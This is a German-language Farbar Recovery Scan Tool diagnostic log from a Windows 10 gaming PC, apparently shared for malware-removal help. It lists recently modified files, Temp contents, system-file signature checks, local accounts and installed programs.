2016-04-28 21:45 - 2015-07-29 12:41 - 00001132 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-04-28 21:12 - 2015-07-29 12:41 - 00001136 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-04-28 20:56 - 2015-09-24 15:09 - 00000000 ____D C:\Users\Harun\AppData\Roaming\.minecraft
2016-04-28 20:45 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-04-28 20:45 - 2015-07-29 14:04 - 00004156 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{72B71363-67D7-4D80-A0FC-60FE645FEBE1}
2016-04-27 19:40 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\rescache
2016-04-27 17:05 - 2015-07-29 15:43 - 00000000 ____D C:\Users\Harun\AppData\Local\Battle.net
2016-04-27 16:43 - 2016-02-13 18:59 - 00775524 _____ C:\WINDOWS\system32\perfh007.dat
2016-04-27 16:43 - 2016-02-13 18:59 - 00155338 _____ C:\WINDOWS\system32\perfc007.dat
2016-04-27 16:43 - 2015-10-30 09:21 - 00000000 ____D C:\WINDOWS\INF
2016-04-27 16:43 - 2015-07-29 13:31 - 01799166 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-04-27 13:54 - 2015-09-29 16:26 - 00000000 ____D C:\Users\Harun\Desktop\Minecraft
2016-04-26 21:35 - 2016-01-12 18:35 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Notepad++
2016-04-26 21:02 - 2015-07-29 14:03 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-04-26 20:43 - 2015-10-30 09:24 - 00000000 ___HD C:\Program Files\WindowsApps
2016-04-26 17:11 - 2016-02-13 19:26 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-04-26 17:11 - 2015-10-30 08:28 - 00524288 ___SH C:\WINDOWS\system32\config\BBI
2016-04-26 16:59 - 2015-07-29 17:16 - 00000000 ____D C:\Users\Harun\AppData\LocalLow\Temp
2016-04-25 17:21 - 2016-02-13 19:32 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-04-25 17:21 - 2016-02-13 10:22 - 00234560 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-04-25 17:20 - 2016-02-13 19:13 - 00000000 ____D C:\Program Files\Windows Journal
2016-04-25 17:20 - 2015-10-30 09:24 - 00000000 __RSD C:\WINDOWS\Media
2016-04-25 17:20 - 2015-10-30 09:24 - 00000000 ___RD C:\WINDOWS\PurchaseDialog
2016-04-25 17:20 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2016-04-25 17:20 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2016-04-25 17:20 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\system32\appraiser
2016-04-25 17:20 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\PolicyDefinitions
2016-04-25 17:20 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\bcastdvr
2016-04-25 17:20 - 2015-10-30 09:24 - 00000000 ____D C:\Program Files\Windows Portable Devices
2016-04-25 17:20 - 2015-10-30 09:24 - 00000000 ____D C:\Program Files\Windows Multimedia Platform
2016-04-25 17:20 - 2015-10-30 09:24 - 00000000 ____D C:\Program Files (x86)\Windows Portable Devices
2016-04-25 17:20 - 2015-10-30 09:24 - 00000000 ____D C:\Program Files (x86)\Windows Multimedia Platform
2016-04-25 17:20 - 2015-10-30 08:28 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism
2016-04-25 17:20 - 2015-10-30 08:28 - 00000000 ____D C:\WINDOWS\system32\Dism
2016-04-25 14:08 - 2015-11-21 15:21 - 00000000 ___RD C:\Users\Harun\Desktop\NVU (YAVUZ)
2016-04-25 13:37 - 2015-10-30 09:11 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-04-25 13:26 - 2015-11-07 20:53 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2016-04-25 13:23 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\appcompat
2016-04-24 22:11 - 2015-07-29 13:28 - 00000000 ____D C:\Users\Harun\AppData\Local\Packages
2016-04-24 22:09 - 2016-02-03 10:50 - 00001095 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Audacity.lnk
2016-04-24 22:09 - 2015-12-02 13:13 - 00001722 _____ C:\Users\Harun\Desktop\TeamSpeak 3 Client.lnk
2016-04-24 22:09 - 2015-09-16 17:58 - 00002535 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Apple Software Update.lnk
2016-04-24 22:09 - 2015-07-29 16:33 - 00001874 _____ C:\Users\Harun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Spotify.lnk
2016-04-24 22:09 - 2015-07-29 13:30 - 00002429 _____ C:\Users\Harun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2016-04-24 22:09 - 2015-07-29 13:30 - 00001047 _____ C:\Users\Harun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Optionale Features.lnk
2016-04-24 22:08 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\Provisioning
2016-04-24 21:59 - 2016-02-02 15:15 - 00000000 ___RD C:\Users\Harun\OneDrive
2016-04-24 20:15 - 2015-10-30 09:24 - 00028672 _____ C:\WINDOWS\system32\config\BCD-Template
2016-04-24 20:11 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\SysWOW64\MUI
2016-04-24 20:11 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\system32\MUI
2016-04-24 19:22 - 2015-10-30 09:24 - 00000000 ____D C:\Program Files\Windows NT
2016-04-24 19:22 - 2015-07-29 13:02 - 00352499 _____ C:\WINDOWS\diagerr.xml
2016-04-24 19:22 - 2015-07-29 13:02 - 00036080 _____ C:\WINDOWS\diagwrn.xml
2016-04-24 19:21 - 2015-10-30 09:24 - 00000000 __RHD C:\Users\Public\Libraries
2016-04-24 19:21 - 2015-10-30 09:24 - 00000000 ___HD C:\WINDOWS\system32\GroupPolicyUsers
2016-04-24 19:21 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\system32\WinBioDatabase
2016-04-24 19:21 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\Registration
2016-04-24 19:21 - 2015-07-31 18:06 - 00002306 _____ C:\WINDOWS\System32\Tasks\{812DDBC9-50E6-4521-ABD6-CA97EAF205AD}
2016-04-24 19:21 - 2015-07-31 18:05 - 00002306 _____ C:\WINDOWS\System32\Tasks\{851C45EB-4FE8-42FB-AFE6-FF991A964C5B}
2016-04-24 19:21 - 2015-07-29 13:27 - 00023056 _____ C:\WINDOWS\system32\emptyregdb.dat
2016-04-24 19:21 - 2015-07-29 12:41 - 00003648 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2016-04-24 19:21 - 2015-07-29 12:41 - 00003424 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2016-04-24 19:19 - 2016-03-09 18:28 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2016-04-24 19:19 - 2016-02-27 14:24 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Minecraft
2016-04-24 19:19 - 2016-01-10 01:52 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2016-04-24 19:19 - 2016-01-10 01:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2016-04-24 19:19 - 2015-10-30 08:28 - 00032768 ___SH C:\WINDOWS\system32\config\ELAM
2016-04-24 19:19 - 2015-08-22 20:29 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DVDVideoSoft
2016-04-24 19:19 - 2015-08-18 19:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Active@ ISO Burner
2016-04-24 19:19 - 2015-08-01 19:01 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MSI Kombustor 2.5
2016-04-24 19:19 - 2015-07-29 20:17 - 00000000 ___SD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OpenOffice 4.1.1
2016-04-24 19:19 - 2015-07-29 16:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Heroes of the Storm
2016-04-24 19:19 - 2015-07-29 15:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\World of Warcraft
2016-04-24 19:19 - 2015-07-29 15:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battle.net
2016-04-24 19:19 - 2015-07-29 15:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2016-04-24 19:19 - 2015-07-29 15:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamSpeak 3 Client
2016-04-24 19:19 - 2015-07-10 11:05 - 00000000 ____D C:\Users\Default.migrated
2016-04-24 19:18 - 2016-02-13 19:03 - 00000000 ____D C:\WINDOWS\OCR
2016-04-24 19:18 - 2016-02-13 18:58 - 00000000 ____D C:\WINDOWS\SysWOW64\sysprep
2016-04-24 19:18 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\SysWOW64\migwiz
2016-04-24 19:18 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\SysWOW64\IME
2016-04-24 19:18 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\system32\NDF
2016-04-24 19:18 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\system32\IME
2016-04-24 19:18 - 2015-10-30 09:24 - 00000000 ____D C:\WINDOWS\schemas
2016-04-24 19:17 - 2016-02-13 18:58 - 00000000 ____D C:\WINDOWS\DigitalLocker
2016-04-24 19:17 - 2015-12-11 20:19 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2016-04-24 19:17 - 2015-11-21 14:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Nvu
2016-04-24 19:17 - 2015-10-30 09:24 - 00000000 __SHD C:\Program Files\Windows Sidebar
2016-04-24 19:17 - 2015-10-30 09:24 - 00000000 __SHD C:\Program Files (x86)\Windows Sidebar
2016-04-24 19:17 - 2015-10-30 09:24 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2016-04-24 19:17 - 2015-09-23 16:25 - 00000000 ____D C:\Users\faruk\AppData\Local\Packages
2016-04-24 19:17 - 2015-07-31 21:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CPUID
2016-04-24 19:17 - 2015-07-29 14:58 - 00000000 ____D C:\Users\aysec\AppData\Local\Packages
2016-04-24 19:17 - 2015-07-29 13:43 - 00000000 ____D C:\Program Files\NVIDIA Corporation
2016-04-24 19:17 - 2015-07-29 13:43 - 00000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2016-04-24 19:17 - 2011-04-12 09:54 - 00000000 ___RD C:\Users\Public\Recorded TV
2016-04-24 19:16 - 2015-10-30 08:28 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2016-04-24 19:05 - 2016-02-13 20:36 - 00000000 ___HD C:\$WINDOWS.~BT
2016-04-23 13:44 - 2015-12-12 17:51 - 00036904 _____ (Wellbia.com Co., Ltd.) C:\WINDOWS\xhunter1.sys
2016-04-22 19:15 - 2015-07-29 15:43 - 00000000 ____D C:\Users\Harun\AppData\Local\Blizzard Entertainment
2016-04-22 19:12 - 2015-07-29 15:42 - 00000000 ____D C:\ProgramData\Blizzard Entertainment
2016-04-22 09:57 - 2010-11-21 05:27 - 00453288 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
2016-04-19 16:11 - 2016-03-08 16:24 - 00000008 __RSH C:\ProgramData\ntuser.pol
2016-04-19 15:44 - 2015-07-29 16:37 - 00000000 ____D C:\Program Files (x86)\Avira
2016-04-19 14:41 - 2015-07-29 16:36 - 00000000 ____D C:\ProgramData\Package Cache
2016-04-19 12:39 - 2015-09-16 17:58 - 00000000 ____D C:\Program Files\Common Files\Apple
2016-04-16 17:24 - 2016-02-03 10:50 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Audacity
2016-04-16 12:41 - 2015-07-29 16:33 - 00000000 ____D C:\Users\Harun\AppData\Local\Spotify
2016-04-16 12:41 - 2015-07-29 16:32 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Spotify
2016-04-15 18:02 - 2015-08-14 19:28 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-04-15 18:00 - 2015-08-14 19:28 - 135176864 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-04-11 23:31 - 2016-03-08 16:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wondershare
2016-04-11 23:28 - 2015-08-01 22:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-04-11 20:21 - 2016-02-27 14:24 - 00000000 ____D C:\Program Files (x86)\Minecraft
2016-04-11 20:21 - 2016-02-02 19:29 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Sony
2016-04-11 20:21 - 2015-07-30 19:07 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Skype
2016-04-11 13:22 - 2015-10-22 16:22 - 00000000 ____D C:\Users\Harun\AppData\Local\AMD
2016-04-10 22:05 - 2015-08-01 19:13 - 00000000 ____D C:\Program Files (x86)\AMD
2016-04-10 17:32 - 2015-07-30 15:07 - 00000000 ____D C:\ProgramData\TuneUp Software
2016-04-07 22:37 - 2015-07-29 15:43 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Battle.net
2016-04-07 22:37 - 2015-07-29 15:42 - 00000000 ____D C:\ProgramData\Battle.net
2016-04-06 20:32 - 2015-10-30 09:26 - 00829944 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2016-04-06 20:32 - 2015-10-30 09:26 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2016-04-05 09:45 - 2015-08-09 07:13 - 07466024 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SET9108.tmp
2016-04-05 09:45 - 2015-08-01 18:47 - 00162784 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\SET9CFC.tmp
2016-04-05 09:45 - 2015-08-01 18:47 - 00143600 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SETA81C.tmp
2016-04-05 09:44 - 2015-08-09 07:13 - 09618784 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\SET84BF.tmp
2016-04-05 09:44 - 2015-08-09 07:13 - 00130616 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\SET9CDB.tmp
2016-04-05 09:44 - 2015-08-09 07:13 - 00112392 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SETA80A.tmp
2016-04-05 09:43 - 2015-08-09 07:13 - 00112392 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SET9C84.tmp
2016-04-05 09:43 - 2015-08-01 18:47 - 09675944 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SET9635.tmp
2016-04-05 09:43 - 2015-08-01 18:47 - 01265208 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SET9F16.tmp
2016-04-05 09:39 - 2015-08-01 18:47 - 00685584 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Drivers\SET9CC9.tmp
2016-04-05 09:38 - 2015-08-09 07:10 - 00451088 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\SET85B6.tmp
2016-04-05 09:38 - 2015-08-09 07:10 - 00151056 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SETA82E.tmp
2016-04-05 09:37 - 2015-08-09 07:10 - 01285136 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\SET8512.tmp
2016-04-05 09:37 - 2015-08-09 07:10 - 00953360 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\SET91F9.tmp
2016-04-05 09:35 - 2015-08-09 07:10 - 40135696 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\SETA7D7.tmp
2016-04-05 09:35 - 2015-08-09 07:10 - 21739024 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\SET9BA2.tmp
2016-04-05 09:27 - 2015-08-09 07:13 - 08929400 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\SET8401.tmp
2016-04-05 09:27 - 2015-08-09 07:13 - 08669624 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SET91B6.tmp
2016-04-05 09:27 - 2015-08-01 18:47 - 11735800 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\SET906A.tmp
2016-04-05 09:27 - 2015-08-01 18:47 - 01539560 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\SET9D3E.tmp

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2016-03-30 20:14 - 2016-03-30 20:14 - 0000000 _____ () C:\Users\Harun\AppData\Roaming\dc.ogt
2016-01-12 18:41 - 2016-01-19 16:52 - 0000600 _____ () C:\Users\Harun\AppData\Roaming\winscp.rnd
2016-01-13 15:38 - 2016-01-19 16:53 - 0000600 _____ () C:\Users\Harun\AppData\Local\PUTTY.RND
2015-07-30 15:17 - 2015-07-30 15:17 - 0007605 _____ () C:\Users\Harun\AppData\Local\Resmon.ResmonCfg
2016-04-24 19:16 - 2016-04-24 19:16 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

Einige Dateien in TEMP:
====================
C:\Users\Harun\AppData\Local\Temp\jansi-64-git-Spigot-f972b36-78434e8-1616940196857562298.dll
C:\Users\Harun\AppData\Local\Temp\jansi-64-git-Spigot-f972b36-78434e8-2127109653741487670.dll
C:\Users\Harun\AppData\Local\Temp\jansi-64-git-Spigot-f972b36-78434e8-3146617107782506770.dll
C:\Users\Harun\AppData\Local\Temp\jansi-64-git-Spigot-f972b36-78434e8-3880649023123431037.dll
C:\Users\Harun\AppData\Local\Temp\jansi-64-git-Spigot-f972b36-78434e8-3940753400980138157.dll
C:\Users\Harun\AppData\Local\Temp\jansi-64-git-Spigot-f972b36-78434e8-4022437842663465218.dll
C:\Users\Harun\AppData\Local\Temp\jansi-64-git-Spigot-f972b36-78434e8-5263987048219543250.dll
C:\Users\Harun\AppData\Local\Temp\jansi-64-git-Spigot-f972b36-78434e8-598185314547822748.dll
C:\Users\Harun\AppData\Local\Temp\jansi-64-git-Spigot-f972b36-78434e8-5989975920392180616.dll
C:\Users\Harun\AppData\Local\Temp\jansi-64-git-Spigot-f972b36-78434e8-6626490681780979018.dll
C:\Users\Harun\AppData\Local\Temp\jansi-64-git-Spigot-f972b36-78434e8-7315029791487536515.dll
C:\Users\Harun\AppData\Local\Temp\jansi-64-git-Spigot-f972b36-78434e8-7361335506411574070.dll
C:\Users\Harun\AppData\Local\Temp\jansi-64-git-Spigot-f972b36-78434e8-7585762768774386442.dll
C:\Users\Harun\AppData\Local\Temp\jansi-64-git-Spigot-f972b36-78434e8-7982871977176959524.dll
C:\Users\Harun\AppData\Local\Temp\jansi-64-git-Spigot-f972b36-78434e8-83401477024159794.dll
C:\Users\Harun\AppData\Local\Temp\jansi-64-git-Spigot-f972b36-78434e8-8522770475781470779.dll
C:\Users\Harun\AppData\Local\Temp\jansi-64-git-Spigot-f972b36-78434e8-8525941683377466631.dll
C:\Users\Harun\AppData\Local\Temp\jansi-64-git-Spigot-f972b36-78434e8-8704109460256938372.dll
C:\Users\Harun\AppData\Local\Temp\jansi-64-git-Spigot-f972b36-78434e8-91747878605820615.dll
C:\Users\Harun\AppData\Local\Temp\xmlUpdater.exe


==================== Bamital & volsnap =================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert


LastRegBack: 2016-04-24 19:31

==================== Ende von FRST.txt ============================
Addition

Code:
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:18-04-2016
durchgeführt von Harun (2016-04-28 21:47:16)
Gestartet von C:\Users\Harun\Downloads
Windows 10 Pro Version 1511 (X64) (2016-04-24 17:22:30)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-2630849102-760198568-3561441068-500 - Administrator - Disabled)
aysec (S-1-5-21-2630849102-760198568-3561441068-1004 - Limited - Enabled) => C:\Users\aysec
DefaultAccount (S-1-5-21-2630849102-760198568-3561441068-503 - Limited - Disabled)
faruk (S-1-5-21-2630849102-760198568-3561441068-1009 - Limited - Disabled) => C:\Users\faruk
Gast (S-1-5-21-2630849102-760198568-3561441068-501 - Limited - Disabled)
Harun (S-1-5-21-2630849102-760198568-3561441068-1000 - Administrator - Enabled) => C:\Users\Harun
HomeGroupUser$ (S-1-5-21-2630849102-760198568-3561441068-1002 - Limited - Enabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

ACP Application (Version: 2016.0403.2316.14 - Advanced Micro Devices, Inc.) Hidden
AMD Install Manager (HKLM\...\AMD Catalyst Install Manager) (Version: 9.0.000.4 - Advanced Micro Devices, Inc.)
Apple Application Support (32-Bit) (HKLM-x32\...\{FE5C2FAA-118D-4509-B51D-3F71CC9E1B3E}) (Version: 4.3 - Apple Inc.)
Apple Application Support (64-Bit) (HKLM\...\{2937FD88-C9D6-4B82-B539-37CD0A572F42}) (Version: 4.3 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{2E4AF2A6-50EA-4260-9BA4-5E582D11879A}) (Version: 9.3.0.15 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{56EC47AA-5813-4FF6-8E75-544026FBEA83}) (Version: 2.2.0.150 - Apple Inc.)
AVG PC TuneUp (HKLM-x32\...\AVG PC TuneUp) (Version: 16.32.2.3320 - AVG Technologies)
AVG PC TuneUp (x32 Version: 16.32.5 - AVG Technologies) Hidden
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Battlefield 4™ (HKLM-x32\...\{ABADE36E-EC37-413B-8179-B432AD3FACE7}) (Version: 1.4.2.30944 - Electronic Arts)
Battlefield™ Hardline (HKLM-x32\...\{CB4AC3DA-8CC1-4516-86DA-4078B57DB229}) (Version: 1.1.0.5 - Electronic Arts)
Battlelog Web Plugins (HKLM-x32\...\Battlelog Web Plugins) (Version: 2.7.1 - EA Digital Illusions CE AB)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Catalyst Control Center Next Localization BR (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 5.16 - Piriform)
Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version:  - Valve)
Counter-Strike: Source (HKLM-x32\...\Steam App 240) (Version:  - Valve)
FMW 1 (Version: 1.73.2 - AVG Technologies) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 49.0.2623.112 - Google Inc.)
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version:  - Blizzard Entertainment)
HP Support Solutions Framework (HKLM-x32\...\{B1AD4FFB-DD17-43EC-8C30-B9E71EAD9132}) (Version: 12.2.8.17 - Hewlett-Packard Company)
iTunes (HKLM\...\{A31C5565-90D9-4615-AE13-94D86C3836C7}) (Version: 12.3.3.17 - Apple Inc.)
Java 8 Update 51 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218051F0}) (Version: 8.0.510 - Oracle Corporation)
Java 8 Update 91 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418091F0}) (Version: 8.0.910.14 - Oracle Corporation)
Java SE Development Kit 8 Update 91 (64-bit) (HKLM\...\{64A3A4F4-B792-11D6-A78A-00B0D0180910}) (Version: 8.0.910.14 - Oracle Corporation)
Malwarebytes Anti-Malware Version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
